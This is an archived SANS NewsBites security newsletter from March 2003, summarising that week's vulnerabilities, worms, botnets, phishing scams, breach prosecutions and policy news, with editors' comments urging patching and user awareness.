From: The SANS Institute (NewsBitessans.org)
Date: Wed Mar 19 2003 - 09:53:37 CST

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Stephen Northcutt offered this chilling observation about today's
NewsBites: "One of the theories of information warfare is that
you release a number of virus/worms near the front edge of war to
disrupt your enemy. You will notice a number of new worms in this
issue including one directly involved in the India/Pakistan tensions.
Even if these are not related to the current crisis in Iraq, this is
a taste of what to expect on the Internet in the future as countries
prepare for war."

And on a more personal level: If you live near New York, Baltimore,
Washington, Atlanta, San Francisco, London, Colorado Springs, Portland
OR, Raleigh, Monterey CA, Singapore or Melbourne, we will be bringing
a hands-on SANS training program to your area within the next 130
days. If you live elsewhere and can assemble at least 30 students,
we can bring a program to you. See: www.sans.org

                                    Alan

***********************************************************************
SANS NewsBites March 19, 2003 Vol. 5, Num. 11
***********************************************************************

TOP OF THE NEWS
  Critical Buffer Overflow Vulnerability in IIS 5.0 on Windows 2000
  Bot Networks Could Launch Huge Denial of Service Attacks
  UT Student Charged in University Security Breach Case
  Man Pleads Guilty to Sandia National Labs Breach
  New Twist on Password Stealing Scam
  Charges Against Second Bloomberg Extortion Defendant Dropped

THE REST OF THE WEEK'S NEWS
  Gold Standard Security Benchmarks Released For Cisco IOS and Solaris
  Kerberos Vulnerability Details on Mailing List
  Former Employees Allegedly Hacked Company System Through Old
     Accounts
  W32/Cult-A Worm
  Bibrog-B Worm Hides Behind Game, Alters Browsers
  Bush Will Name Two to Top DHS Posts
  Yaha Variant Released in Hacker Rivalry
  Memory Stick Contained Patient Data
  Pakistan Establishes Cybercrime Response Center
  Piracy Ringleader Indicted
  Man Under House Arrest Stole Personal Data
  Qatar News Portal Target of Attack
  CodeRed Variant in the Wild
  CERT/CC Issues Advisory on Weak Password protection on SMB File
     Shares
  IP Spoofing
  The Benefits of Using a Managed Security Services Provider
  Worm's Rapid Spread Due in Part to Weak Passwords
  Stolen Computer Equipment Contained Personal Data
  DOD Commanders Responsible for IT Security
  Demo Belies Product's Usefulness
  Iraq's ISP Traffic Moves through US and UK Satellite Hookups

SECURITY TRAINING UPDATE
If employees have responsibility for security -- whether as system
administrators or as security officers, analysts, or consultants --
their employer deserves to know that they have mastered the minimum
set of essential skills needed to do the job. Those are the skills
covered in the GIAC Security Essentials course (SANS Track 1) and
examinations. (Track 1 Boot Camp also includes the CISSP CBK.) If
Track 1 is too advanced, SANS Security+ (SANS Track 9) program is a
great starting point. Attend live training in ten cities, mentored
training in thirty more cities, or ask to schedule a course at your
location. Details at http://www.sans.org

****************** This Issue Sponsored by Websense ******************

Deadly Internet Sin #1: LUST

Whether it's adult entertainment, gambling or hacking sites, your
company can't afford to ignore the risk. Limit the liability threat
of Internet misuse by using Websense Enterprise.

A superior database, flexible filtering options, comprehensive
reporting and seamless integration have made Websense the preferred
employee Internet management software of the Fortune 500.

Download a free, 30-day trial! http://www.websense.com?id=NL15887
***********************************************************************

TOP OF THE NEWS

 --Critical Buffer Overflow Vulnerability in IIS 5.0 on Windows 2000
(17 March 2003)
Microsoft issued a CRITICAL warning about a buffer overflow flaw in
a WebDAV component of Windows exploited through Internet Information
Server (IIS) version 5.0 running on Windows 2000. Other versions
of Windows are not affected. A tool to exploit the vulnerability
is circulating on the Internet, but Microsoft did not learn of the
vulnerability until after hackers had exploited it. The exploit was
against a US military site. Patches and work-arounds are available.
http://news.com.com/2100-1002-992920.html
http://www.theregister.co.uk/content/55/29795.html
http://www.computerworld.com/securitytopics/security/holes/story/0,10801,79441,00.html
http://www.msnbc.com/news/886524.asp?0cv=TA00
http://www.microsoft.com/technet/security/bulletin/MS03-007.asp
http://www.cert.org/advisories/CA-2003-09.html
SANS, ISS, and Microsoft ran a wonderful "Ask The Experts" web
broadcast Tuesday afternoon answering more than 75 questions about
which systems are and are not vulnerable and what needs to be done to
protect your organization. It is the first one listed on the webcast
archives page at http://www.sans.org/webcasts/archive.php
[Editor's Note (Paller): Fix this one right away. Automated attack
tools and worms are only days away.]

 --Bot Networks Could Launch Huge Denial of Service Attacks
(17 March 2003)
At least five large networks of compromised machines that could
be used to launch massive denial of service attacks. The machines
have had bots placed on them; the bots establish communication with
Internet Relay Chat (IRC) servers to receive commands.
http://www.eweek.com/article2/0,3959,935790,00.asp
[Editor's Note (Paller): These networks have up to 140,000 systems
each. Compare that to the 230 (not 230 thousand) machines needed
to take down an Internet II site, 330 to take down a major US
Intelligence site, and you get an idea how much power is in these
networks. They are more than sufficient to cause widespread outages.
Many of these systems have been compromised by persuading the users to
download a game or picture or other file that must be executed. The
games and pictures are real, but they contain the malicious software
as an extra surprise.]

 --UT Student Charged in University Security Breach Case
(14 March 2003)
Christopher Andrew Phillips, a computer science student at the
University of Texas (UT) at Austin, has been charged in connection
to the security breach of the university's computer system that
exposed the personal data of over 55,000 people. A grand jury is
investigating the case. If convicted of the charges of unlawful
access to a protected computer and unlawful use of identification,
Phillips could face five years in prison and be ordered to pay $500,000
in restitution.
http://www.siliconvalley.com/mld/siliconvalley/news/editorial/5393600.htm
http://www.washingtonpost.com/wp-dyn/articles/A27370-2003Mar14.html

 --Man Pleads Guilty to Sandia National Labs Breach
(14 March 2003)
An 18 year-old Pakistani man had pleaded guilty to computer and
credit card fraud charges. Adil Yahya Zakaria Shakour breached
security at the Sandia National Laboratories' computer network and
he defaced an Eglin Air Force Base web site. He also broke into a
computer system at a North Carolina-based tax forms company and stole
credit card information that he used to buy $7,000 worth of goods.
Shakour faces deportation after a possible 15-year prison sentence;
he will also have to pay restitution in the amount of $100,000.
Sentencing is set for June 12.
http://www.washingtonpost.com/wp-dyn/articles/A23590-2003Mar14.html

 --New Twist on Password Stealing Scam
(13/14 March 2003)
Discover cardholders are the latest target in password stealing scams.
Customers have been receiving e-mail messages telling them their
accounts have been put on hold due to inactivity, and that in order
to reactivate their accounts, they must log in to the account;
responses to the message are sent to a Russian Internet address.
Information collected includes plenty of identifiers that would enable
identity theft: social security number, mother's maiden name, account
number and passwords. PayPal and eBay customers have been targeted
by similar scams. The method employed by this scheme is different;
the e-mail linked to a real Discover site, but the submission form
was wrapped in a hidden submission so the information was sent to
the attacker.
http://www.msnbc.com/news/884810.asp
http://www.computerworld.com/securitytopics/security/cybercrime/story/0,10801,79380,00.html

 --Charges Against Second Bloomberg Extortion Defendant Dropped
(10 March 2003)
Charges against Igor Yarimaka, an alleged accomplice in the Bloomberg
extortion case, have been dropped because the evidence against him was
weak. Oleg Zezov was recently convicted and faces a prison sentence
of up to 20 years. The two allegedly tried to exact a payment of
$200,000 in return for keeping quiet about vulnerabilities in the
Bloomberg financial company's computer system.
http://www.theregister.co.uk/content/55/29674.html

************************ SPONSORED LINKS ******************************
Privacy notice: These links redirect to non-SANS web pages.

(1) FOIL NETWORK ATTACKS BEFORE THEY'RE LAUNCHED! Automatically
     prevent intrusions. FREE DEMO.
http://www.sans.org/cgi-bin/sanspromo/NB146

(2) Delegate root privileges with PowerBroker(r) - described as "sudo
     on steroids".
http://www.sans.org/cgi-bin/sanspromo/NB147

(3) 30% of the Global 100 use Permeo to secure their applications.
      Do you?
http://www.sans.org/cgi-bin/sanspromo/NB148
***********************************************************************

THE REST OF THE WEEK'S NEWS

 --Gold Standard Security Benchmarks Released For Cisco IOS and Solaris
Two additional Gold Standard configurations have been agreed upon by
the US General Services Administration (GSA), National Institute of
Standards and Technology (NIST), Defense Information Systems Agency
(DISA), and National Security Agency (NSA), along with the many
corporate and international members of the Center for Internet
Security (CIS). These cover the most popular routers (Cisco) and
the most popular version of UNIX (Solaris). An updated benchmark
for Windows 2000 was also released. The benchmarks and associated
automated scoring tools are available for download free of charge
from the CIS web site.
http://www.cisecurity.org
[Editor's Note (Paller): Over the next few months you'll begin to
see major system vendors beginning to deliver systems configured
in accordance with the Center for Internet Security benchmarks.
Buying and deploying safely configured systems is the first step in
reducing the danger from massive worms, and will, I believe, quickly
become a minimum standard of due care.]

 --Kerberos Vulnerability Details on Mailing List
(17 March 2003)
Details of a vulnerability in the Kerberos v.4 authentication protocol
were leaked to a mailing list; the author of the original paper
asked administrators to remove the information, but they refused.
The author later posted the details himself. The vulnerability allows
attackers to "impersonate any principal in a given realm."
http://www.eweek.com/article2/0,3959,937380,00.asp

 --Former Employees Allegedly Hacked Company System Through Old Accounts
(15 March 2003)
The computer system at LapLink, a software company, was allegedly
hacked by two former employees who used accounts that hadn't been
deleted. The attack caused the e-mail system to go down and apparently
deleted crucial files. LapLink CEO Mark Eppley reportedly plans to
file charges.
http://seattletimes.nwsource.com/html/businesstechnology/134653561_laplink150.html

 --W32/Cult-A Worm
(14 March 2003)
The W32/Cult-A worm arrives as a .pdf attachment purporting to be a
greeting card; it also includes a Trojan horse program. It spreads
via random e-mail addresses and through KaZaA peer-to-peer network
file sharing. If the attachment is launched, the worm generates a
false error message and installs itself as windowsupdate.exe in the
Windows System folder to ensure it is run on startup. Cult also
connects to an IRC server to listen for more instructions.
http://www.pcpro.co.uk/?http://www.pcpro.co.uk/news/news_story.php?id=39554

 --Bibrog-B Worm Hides Behind Game, Alters Browsers
(14 March 2003)
The Bibrog-B worm arrives as an attachment. It appears to be a
shooting game, but while the game is running, the worm is dropping
its payload: it copies itself to the infected machine's hard drive
and sends itself out to all addresses in the Outlook address book
or through file sharing. In what is probably an attempt to harvest
personal information, Bibrog-B also alters browsers on infected
machines so that they will display phony versions of real websites.
http://www.theregister.co.uk/content/56/29768.html
http://www.sophos.com/virusinfo/analyses/w32bibrogb.html
[Editor's Note (Paller): If you are responsible for security awareness
in your organization, get this story (and the previous one) to all
your coworkers and emphasize that their children do not know the
difference between safe games and infected games. And if you are
using VPNs, an infected PC system is a perfect hacker access point
to your most important information systems. Infected machines
brought from home to work can infect all your corporate systems.
If your coworkers are allowing their children to use their business
computers, or if they are downloading games and pictures themselves,
they may be putting your entire network at risk. Tens of thousands
of systems are being taken over through such ruses every month. Your
coworkers will not know about this risk unless you tell them.]

 --Bush Will Name Two to Top DHS Posts
(13 March 2003)
The Bush administration has announced that it will fill
two top positions at the new Department of Homeland Security
(DHS). Robert Liscouski, director of information assurance for
the Coca-Cola Corporation, will be named assistant secretary of
infrastructure protection; Liscouski is presently director of the CIA's
Intelligence Science Board. Paul Redmond, who was formerly chief
of CIA counterintelligence, will become the assistant secretary for
information analysis. To date, no one has been named to head the DHS's
Information Analysis and Infrastructure Protection (IAIP) directorate.
http://www.washingtonpost.com/wp-dyn/articles/A21843-2003Mar13.html
http://www.fcw.com/fcw/articles/2003/0310/web-home-03-14-03.asp

 --Yaha Variant Released in Hacker Rivalry
(13 March 2003)
A group of Indian hackers has released a new variant of the Yaha worm
that launched denial of service attacks on a handful of prominent
Pakistani sites. Yaha-Q arrives as an attachment or through shared
network drives. It tries to disable anti-virus software, places a
backdoor on systems it infects and sends itself out to addresses in
the address book. The worm also stores insulting messages about a
rival Pakistani hacking group.
http://www.reuters.com/newsArticle.jhtml?type=topNews&storyID=2371420
http://www.wired.com/news/infostructure/0,1377,58026,00.html

 --Memory Stick Contained Patient Data
(13 March 2003)
A woman who bought a portable memory stick that was supposed to be new
found that it actually contained personal information about 13 cancer
patients from the Royal Bolton Hospital in Lancashire (UK). Hospital
officials say they will contact people affected by the information
leak and will take steps to ensure that it doesn't happen again.
http://www.theregister.co.uk/content/55/29752.html
[Editor's Note (Ranum): Making sure sensitive data is deleted off
of media is going to be a huge problem in the future. It opens the
question of who gets access to what, and how we make sure they do the
right thing with the data, following. Browser-enabled applications
seldom do the right thing with cached sensitive information that may
be exposed on a hard drive. It's amazing what you can find on a hard
disk these days.]

 --Pakistan Establishes Cybercrime Response Center
(13 March 2003)
Pakistan's decision to establish the National Response Center for
Cybercrimes was spurred by the fact that US investigators had to be
brought in to help find the source of the e-mails sent by journalist
Daniel Pearl's kidnappers. The center was established at the
headquarters of a Pakistani intelligence agency.
http://www.cnn.com/2003/TECH/internet/03/13/pakistan.cyber.ap/index.html

 --Piracy Ringleader Indicted
(12 March 2003)
An Australian man who is presumed to be the ringleader of an Internet
piracy group has been indicted by a federal grand jury in Connecticut.
US Attorney Paul McNulty said his office is seeking to extradite Hew
Raymond Griffiths, who could face a ten-year prison sentence and a
$500,000 fine if convicted of the charges against him.
http://news.com.com/2100-1028-992373.html

 --Man Under House Arrest Stole Personal Data
(12 March 2003)
A Florida man who was already under house arrest related to fraudulent
identification use and drug possession charges was arrested and placed
in custody on charges of having stolen personal information belonging
to more than 2,000 people. Sirvon Thomas used the information to
open lines of credit and purchase goods that he sold on eBay, but
never delivered. Thomas is being held without bail.
http://www.usatoday.com/tech/news/2003-03-12-net-theft_x.htm

 --Qatar News Portal Target of Attack
(12 March 2003)
Abdulaziz Al Mahmoud, the chief editor of Qatar's first news portal, Al
Jazeera Net, says that the website has been under attack. The attack
involved blocking bandwidth; Abdulaziz added that the attacker has
not been successful. He called the attack "professional," and said
an attack of that sophistication could have been launched only by
an organization, because one individual could not have the necessary
resources.
http://www.thepeninsulaqatar.com/Display_news.asp?section=Local_News&month=March2003&file=Local_News2003031271650.xml
[Editors' Note (Multiple): Individuals can and do assemble large
networks of slave computers. The network can include far more computing
resources than can be found in many large organizations.]

 --CodeRed Variant in the Wild
(11/12 March 2003)
A new version of Code Red, dubbed CodeRed.F, has been spreading
across the Internet. It exploits the same Internet Information Server
(IIS) vulnerability that the original CodeRed did to create a buffer
overflow on unpatched servers and search for more vulnerable servers.
This version also installs a Trojan horse program on infected systems,
and does not have a shut-off date. CodeRed.F spreads the first 19
days of each month, then launches a daylong attack against the White
House domain, and then shuts off. People who have not patched IIS
vulnerabilities are strongly urged to do so.
http://www.eweek.com/article2/0,3959,924269,00.asp
http://www.computerworld.com/securitytopics/security/story/0,10801,79267,00.html
Relevant Microsoft Bulletins:
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
[Editor's Note (Shpantzer): There's a background radiation of 60,000
IIS machines scanning on behalf of Code Red, at any given time. That's
a sad commentary on the state of IIS server administration, considering
that Code Red is almost two years old.
(Schultz): With all the information, patches, and tools now available
for securing IIS servers, there is really no excuse for anyone's
machine becoming infected by this new, relatively unimaginative
variant of Code Red.]

 --CERT/CC Issues Advisory on Weak Password protection on SMB File
     Shares
(11 March 2003)
The Computer Emergency Response Team Coordination Center (CERT/CC)
has released an advisory warning of an increased number of systems
running Windows 2000 and XP being exploited due to weak password
protection on Server Message Block (SMB) file shares. Tools used
in the exploits include W32/Deloder, GT-bot, sdbot and W32/Slackor.
Gaining administrator level control could let attackers access,
alter and delete files, install malicious software or launch attacks
on other sites. The tools' scanning activity could also increase
network traffic to a point that performance could deteriorate.
Users are urged to disable file sharing, employ strong passwords and
keep up to date with anti-virus signatures.
http://www.cert.org/advisories/CA-2003-08.html
http://www.nwfusion.com/news/2003/0312windobroad.html

 --IP Spoofing
(11 March 2003)
This article provides an overview of the history of IP spoofing,
describes a variety of spoofing attacks and offers ideas on defending
against IP spoofing, including router level filtering and encryption
and authentication.
http://www.securityfocus.com/infocus/1674

 --The Benefits of Using a Managed Security Services Provider
(11 March 2003)
Paul Castellano and John McGillick of Allegheny Energy Inc. explain
the benefits of using a managed security service provider (MSSP) to
monitor intrusion detection systems (IDS). While they had initially
tried in-house monitoring of their IDS, they became overwhelmed by
the resources they needed and by the volume of false positive alerts.
MSSPs provide the resources, knowledge and support necessary for
effectively monitoring an IDS.
http://www.computerworld.com/securitytopics/security/story/0,10801,79255,00.html?nas=SEC-79255

 --Worm's Rapid Spread Due in Part to Weak Passwords
(11 March 2003)
The rapid spread of the Deloder worm can be blamed in part on poor
security practices, including passwords that are easy to guess.
Deloder and another worm, FunLove, both use lists of passwords as
a means of breaking into computers. In addition to strengthening
passwords, users would be well advised to block file sharing.
http://zdnet.com.com/2100-1105-991844.html

 --Stolen Computer Equipment Contained Personal Data
(11 March 2003)
Following the theft of computer equipment from the British Columbia
(Canada) Ministry of Human Resources, 568 people have received letters
cautioning them to keep tabs on their banking and credit card accounts.
While the thieves were likely after the equipment rather than the
information they hold, the potential exposure of social insurance
numbers, birth dates and addresses is cause for concern. Police are
investigating. Several weeks ago, a computer hard drive at a company
in Regina that contained personal details of more than one million
people was stolen. That hardware has been recovered.
http://www.globetechnology.com/servlet/story/RTGAM.20030311.wdata311/GTStory

 --DOD Commanders Responsible for IT Security
(10 March 2003)
DOD Instruction 8500.2 makes individual commanders responsible for
the security of the information that passes through their information
systems. The instruction aims to ensure all military and civilian
personnel receive appropriate education and training pertinent to
their information systems responsibilities. The DOD's information
assurance directorate and its CIO will now develop criteria against
which to measure compliance.
http://www.fcw.com/fcw/articles/2003/0310/news-dod-03-10-03.asp

 --Demo Belies Product's Usefulness
(10 March 2003)
In the Security Manager's Journal, Vince Tuesday describes a software
vendor's revealing presentation. Vince was looking for solutions to
two challenges: managing the data generated by intrusion detection
systems, firewalls, anti-virus applications and the like, and moving
into the arena of anomalous behavior detection. Although the product
seemed appealing at first, a demonstration made clear the fact that
it created more work instead of streamlining an already cumbersome
process.
http://www.computerworld.com/securitytopics/security/story/0,10801,79109,00.html?nas=SEC-79109

 --Iraq's ISP Traffic Moves through US and UK Satellite Hookups
(6 March 2003)
It appears that Iraq's only Internet service provider (ISP) sends and
receives nearly all of its traffic through satellite hookups provided
by companies in the US and the UK. This may violate a US executive
order prohibiting the export of "goods, technology or services" to
Iraq, and of a UN embargo that sanctions member nations from conducting
business with Iraq. In any case, the US and UK governments could
ostensibly ask the companies to halt service to Iraq, thus depriving
the country of e-mail and web access.
http://www.ds-osac.org/view.cfm?KEY=7E4457434756&type=2B170C1E0A3A0F162820

===end===

NewsBites Editorial Board:
Kathy Bradford, Dorothy Denning, Roland Grefer, Stephen Northcutt,
Alan Paller, Marcus Ranum, Eugene Schultz, Gal Shpantzer
Guest Editor: Bruce Schneier

Please feel free to share this with interested parties via email,
but no posting is allowed on web sites. For a free subscription,
(and for free posters) visit http://www.sans.org/sansnews/

To update your address, visit http://www.sans.org/sansurl and enter
your SD number (from the header of this email.) You will receive your
personal URL via email.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+eIYN+LUG5KFpTkYRAmdzAJ9YrZ/SItovURMTi0VePhruTM/i+gCfeSI3
NC3Jz5IhEsRz2RQAZgZx+sw=
=PWfd
-----END PGP SIGNATURE-----

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]